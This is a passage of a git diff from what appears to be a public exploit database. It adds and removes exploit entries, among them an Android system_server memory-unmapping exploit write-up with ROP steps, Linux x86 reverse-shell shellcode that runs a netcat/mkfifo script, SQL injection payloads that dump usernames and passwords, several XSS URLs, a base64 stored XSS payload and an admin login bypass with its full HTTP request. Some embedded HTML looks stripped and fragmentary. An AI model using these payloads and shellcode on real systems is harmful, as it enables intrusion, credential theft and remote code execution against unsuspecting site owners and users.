it accidentally queries the ashmem region for its real size, like so: + + mPixelStorage.ashmem.size = ashmem_get_size_region(fd); + +This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrary large. + +Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling: + + munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size); + +This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS. + +One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data. + +I've attached a short PoC which crashes system_server by repeatedly unmaps large memory regions. + +Suggested Fix: + +Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region. + + + +Here's a brief run-down of the exploit: + +1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool. + +2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size at a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous. + +3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. This will enable us to open up a "hole" in the contiguous allocations, like so: + +<--low high--> + ---------------------------------------------------------------- +| Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | + ---------------------------------------------------------------- + || + \/ +<--low high--> + ---------------------------------------------------------------- +| Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap | + ---------------------------------------------------------------- + +4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so: + +<--low high--> + --------------------------------------------------------------------------- +| Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + --------------------------------------------------------------------------- + +6. Now, similarly to step 3., we can free the chunk directly before the previously unmapped chunk, creating the following state: + +<--low high--> + ----------------------------------------------------------------------------- +| Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + ----------------------------------------------------------------------------- + +6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. Here's what this stage looks like: + +<--low high--> + -------------------------------------------------------------------------------- +| Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | + -------------------------------------------------------------------------------- + || + \/ +<--low high--> + -------------------------------------------------------------------------------- +| Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap | + -------------------------------------------------------------------------------- + +7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information: + a. A chunk of position independent ARM/ARM64 code, followed by + b. A ROP stack +This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state: + +<--low high--> + ------------------------------------------------------------------- +| Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap | + ------------------------------------------------------------------- + +8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied). + + +Proofs of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip diff --git a/platforms/cfm/webapps/27854.txt b/platforms/cfm/webapps/27854.txt deleted file mode 100755 index 2bf0f76c6..000000000 --- a/platforms/cfm/webapps/27854.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/17941/info - -Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. - -Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. - -http://www.example.com/Details.cfm?ProdID=[SQL] diff --git a/platforms/lin_x86/shellcode/40872.c b/platforms/lin_x86/shellcode/40872.c new file mode 100755 index 000000000..7e4a94743 --- /dev/null +++ b/platforms/lin_x86/shellcode/40872.c @@ -0,0 +1,113 @@ +/* +;author: Filippo "zinzloun" Bersani +;date: 05/12/2016 +;version: 1.0 +;X86 Assembly/NASM Syntax +;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit +; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +; Linux bb32 4.4.0-45-generic 32bit + +; description: + get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener, + considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore + this is a different approach that permitt to execute not only netcat. + LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash) + + + +; see comment for details + +global _start + +section .text +_start: + + +CreateFile: + xor eax, eax ;zeroing + xor edx, edx + push eax ;NULL byte as string terminator + push 0x65782e2f ;name of file to be executed /tmp/.xe + push 0x706d742f + mov ebx, esp ;ebx point to pushed string + mov esi, esp ;save the name of the file for a later use + mov al,0x8 ;create the file... + mov cl,077o ;...with 77 permission in octal (to avoid 0) + int 0x80 + + jmp CallPop + +WriteString: + + pop ecx ;get the command string to write in the file, 3rd arg + mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg + mov dl,0x09 ;now we put value $0x09 into dl... + inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) + mov byte [ecx+92],dl ;replace our R char with 0x0A * + + xor edx,edx + mov dl,93 ;len of the buffer to write, 4th arg ** + mov al,0x04 ;sys call to write the file + int 0x80 + mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg + mov dl,0x09 ;now we put value $0x09 into dl... + inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) + mov byte [ecx+92],dl ;replace our R char with 0x0A * + + xor edx,edx + mov dl,93 ;len of the buffer to write, 4th arg ** + mov al,0x04 ;sys call to write the file + int 0x80 + +CloseFile: + xor eax,eax + mov al, 0x6 ;close the stream file + int 0x80 + +ExecFile: + xor eax, eax + push eax ;push null into the stack + ;push ////bin/bash into the stack + push 0x68736162 + push 0x2f6e6962 + push 0x2f2f2f2f + + mov ebx,esp ;set the 1st arg /bin/bash from the stack + ;set up the args array + push eax ; null + push esi ; get the saved pointer to the /tmp/.xe + push ebx ; pointer to /bin/bash + mov ecx, esp ;set the args + + xor edx,edx + mov al, 0xb ;sys call 11 to execute the file + int 0x80 + +CallPop: + call WriteString + ;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*) + ;according to the length of the string + db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR" + +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89" +"\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68" +"\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66" +"\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f" +"\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f" +"\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52"; +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} diff --git a/platforms/linux/remote/40339.py b/platforms/linux/remote/40339.py index dcb3c5f90..cfa77deb9 100755 --- a/platforms/linux/remote/40339.py +++ b/platforms/linux/remote/40339.py @@ -1,4 +1,3 @@ - /* add by SpeeDr00t@Blackfalcon (jang kyoung chip) diff --git a/platforms/php/webapps/14979.txt b/platforms/php/webapps/14979.txt deleted file mode 100755 index b5b50f585..000000000 --- a/platforms/php/webapps/14979.txt +++ /dev/null @@ -1,28 +0,0 @@ -================================================================== -# Exploit Title: AlstraSoft AskMe Pro SQL Injection Vulnerability -# Date: 12/09/2010 -# Author: Amine_92 -# Email: amine92_16@hotmail.fr -# Software Link: http://www.alstrasoft.com/askme.htm -# Version: All Version -# Price: 99.99$ -# Tested on: Xp Sp 2 -# Home: Dark Zone Organization (www.v9b.org/vb) -================================================================== -SQL injection in AlstraSoft AskMe Pro - -Affected items: -http://www.Victime.com/forum_answer.php?que_id=[SQL] - -Example: --9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert-- - -Demo URL: -http://www.Victime.com/forum_answer.php?que_id=-9999+union+all+select+1,2,3,4,group_concat%28username,char%2858%29,password%29v3n0m,6,7,8,9,10+from+expert-- - -================================================================== -Good Luck - -Tank's To : All Memeber Of Dark Zone & Administrator Emptyzero - -Don't Forget Our Brother In Gaza & Palestine \ No newline at end of file diff --git a/platforms/php/webapps/17050.txt b/platforms/php/webapps/17050.txt index f1ef80f0e..3cee1c793 100755 --- a/platforms/php/webapps/17050.txt +++ b/platforms/php/webapps/17050.txt @@ -47,7 +47,7 @@ function xpath(){document.forms["xml"].submit();} function xss(){document.forms["xss"].submit();}
-
+



Exploit XML Injection!
diff --git a/platforms/php/webapps/26110.txt b/platforms/php/webapps/26110.txt deleted file mode 100755 index fe3ef9a6d..000000000 --- a/platforms/php/webapps/26110.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/14499/info - -Gravity Board X (GBX) is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. - -An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. - -http://www.example.com/deletethread.php?board_id="> \ No newline at end of file diff --git a/platforms/php/webapps/38312.txt b/platforms/php/webapps/38312.txt deleted file mode 100755 index b01faa659..000000000 --- a/platforms/php/webapps/38312.txt +++ /dev/null @@ -1,15 +0,0 @@ -source: http://www.securityfocus.com/bid/57948/info - -AbanteCart is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. - -An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. - -AbanteCart 1.1.3 is vulnerable; other versions may also be affected. - -http://www.example.com/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E - -http://www.example.com/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product - -http://www.example.com/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E - -http://www.example.com/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/40877.txt b/platforms/php/webapps/40877.txt new file mode 100755 index 000000000..6ffa2bbfe --- /dev/null +++ b/platforms/php/webapps/40877.txt @@ -0,0 +1,27 @@ +# Exploit Title: AbanteCart 1.2.7 Stored XSS +# Date: 06-12-2016 +# Software Link: http://www.abantecart.com/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +By default all user input is escaped using `htmlspecialchars`. + +But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned. + +http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html + +2. Proof of Concept + +For example `address_1=">&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`. + +So create new order and set `address_1` value as `__e` using for example Burp: + +``` +Content-Disposition: form-data; name="__e" + +YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m +``` \ No newline at end of file diff --git a/platforms/php/webapps/40882.txt b/platforms/php/webapps/40882.txt new file mode 100755 index 000000000..1890a82b1 --- /dev/null +++ b/platforms/php/webapps/40882.txt @@ -0,0 +1,44 @@ +# Exploit Title: Edge SkateShop Authentication Bypass +# Date: 6/12/2016 +# Exploit Author: Delilah +# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html +# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip +# Tested on: xampp + +go to http://localhost/EdgeSketch/adminlogin.php + +username = admin' # + +password = anything + +# Proof of Concept: + +POST /EdgeSketch/adminlogin.php HTTP/1.1 +Host: 10.0.2.15 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://10.0.2.15/EdgeSketch/ +Cookie: PHPSESSID=5n96kq5kd17joptp1sivhm4tl4 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 60 + +admin_username=admin'%20#&admin_password=fdgdhf&admin_login= + + + +HTTP/1.1 200 OK +Date: Tue, 06 Dec 2016 16:10:00 GMT +Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 +X-Powered-By: PHP/5.6.28 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 107 +Connection: close +Content-Type: text/html; charset=UTF-8 + + diff --git a/platforms/windows/dos/40875.html b/platforms/windows/dos/40875.html new file mode 100755 index 000000000..dc1967b64 --- /dev/null +++ b/platforms/windows/dos/40875.html @@ -0,0 +1,64 @@ + + + + + + + diff --git a/platforms/windows/dos/40878.txt b/platforms/windows/dos/40878.txt new file mode 100755 index 000000000..08ef3b86e --- /dev/null +++ b/platforms/windows/dos/40878.txt @@ -0,0 +1,32 @@ +Source: http://blog.skylined.nl/20161201001.html + +Synopsis + +A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Edge. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability. + +Known affected software and attack vectors + +Microsoft Edge 11.0.10240.16384 + +An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script does not prevent an attacker from triggering the vulnerable code path. + +Repro: + +/